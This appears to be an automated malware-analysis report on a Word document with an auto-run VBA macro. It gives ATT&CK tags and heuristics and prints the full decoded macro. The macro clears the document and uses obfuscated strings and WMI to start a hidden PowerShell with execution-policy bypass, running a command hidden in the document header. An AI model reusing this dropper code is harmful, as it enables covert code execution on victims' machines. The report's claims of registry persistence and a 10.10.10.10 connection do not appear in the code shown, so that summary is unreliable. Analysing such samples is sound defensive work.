Verdict: MALICIOUS (Risk Score 230)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1027 Obfuscated Files or Information
The sample contains a VBA macro that executes upon opening the document, as indicated by the Document_Open heuristic. This macro utilizes CreateObject and GetObject calls, along with references to VirtualAlloc and GetProcAddress, suggesting it is designed to download and execute a second-stage payload. The script attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy and communicates with an IP address and port (10.10.10.10:443).
Heuristics (9)

- Reference to GetProcAddress API (high; SC_STR_GETPROCADDRESS): Reference to GetProcAddress API.
- VBA macros detected (medium; OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code.
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
  ```vba
  fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject"
  If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False
  End Function
  ```
- GetObject call (high; OLE_VBA_GETOBJ): GetObject call. Matched lines in script:
  ```vba
  Const HIDDEN_WINDOW = 0
  Set veni = GetObject(strRtMng)
  Set vidi = veni.Get(strProc & "Startup")
  ```
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low; OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
  ```vba
  Private Sub Document_Open()
  in1Line = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text: _
  ```
- Reference to VirtualAlloc API (medium; SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API.
- Macro/content-enable lure (medium; SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://support.microsoft.com/en-us/kb/924074 (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2956 bytes | 417b2b78cec59cbac73f633471d223f196ef053347643396edb3e52c0f2fc018 |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public in1Line As String
Public strfldr As String
Public strVVV As String
Public strExt As String
Public strRtMng As String
Public strProc As String
Private Sub Document_Open()
in1Line = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text: _
ContReplace: _
Enc_Change: _
RptFldrStat: _
Memorandum
End Sub
Private Function ContReplace() As Variant
Dim wordText As String
wordText = "This is an example of Unicode template"
ActiveDocument.StoryRanges(wdMainTextStory).Delete
ActiveDocument.Content.Text = wordText
End Function
Private Function Enc_Change()
Dim strAlpha As String
Dim strPoWP
strAlpha = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
strPoWP = "SysWOW64" & Chr(92) & Left(Mid(strAlpha, 23), 1) & "indo" & Left(Mid(strAlpha, 23), 1) & "s" & Chr(92) & Left(Mid(strAlpha, 29), 1) & ":"
strVVV = Left(Mid(strAlpha, 16), 1) & Left(Mid(strAlpha, 15), 1) & Left(Mid(strAlpha, 23), 1) & Left(Mid(strAlpha, 5), 1) & _
Left(Mid(strAlpha, 18), 1) & Left(Mid(strAlpha, 19), 1) & Left(Mid(strAlpha, 8), 1) & Left(Mid(strAlpha, 5), 1) & Left(Mid(strAlpha, 12), 1) & Left(Mid(strAlpha, 12), 1)
strExt = "." + Chr(CStr(Asc(Mid$(strAlpha, 5, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 24, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 5, 1))))
strPoWP = Split(strPoWP, "\"): strfldr = strPoWP(2) & Chr(92) & strPoWP(1) & Chr(92) & strPoWP(0)
strRtMng = Left(Mid(strfldr, 4), 3) & "mgmts:" & Chr(92) & Chr(92) & Left(Mid(strExt, 1), 1) & Chr(CStr(Asc(Mid$(strfldr, 3, 1)))) & "root" & Chr(92) & "cimv2"
strProc = Left(Mid(strfldr, 4), 3) & "32" & Chr(95) & "Process"
End Function
Private Function RptFldrStat() As Boolean
Dim fsObj As String
fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject"
If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False
End Function
Private Function Memorandum() As Variant
If RptFldrStat = True Then strProgramName = strfldr & "\Windows" & strVVV & "\v1.0\" & strVVV & strExt Else strProgramName = strVVV & strExt
Const HIDDEN_WINDOW = 0
Set veni = GetObject(strRtMng)
Set vidi = veni.Get(strProc & "Startup")
Set vici = vidi.SpawnInstance_
vici.ShowWindow = HIDDEN_WINDOW
Set vvv = GetObject(strRtMng & ":" & strProc)
vvv.Create strProgramName & " -" & Chr(101) & Chr(112) & " " & Chr(98) & Chr(121) & Chr(112) & Chr(97) & Chr(115) & Chr(115) & " -NoProfile -" & Chr(110) & Chr(111) & Chr(101) & Chr(120) & Chr(105) & Chr(116) & " -" & Chr(99) & " " & """" & in1Line & """", Null, vici
End Function
```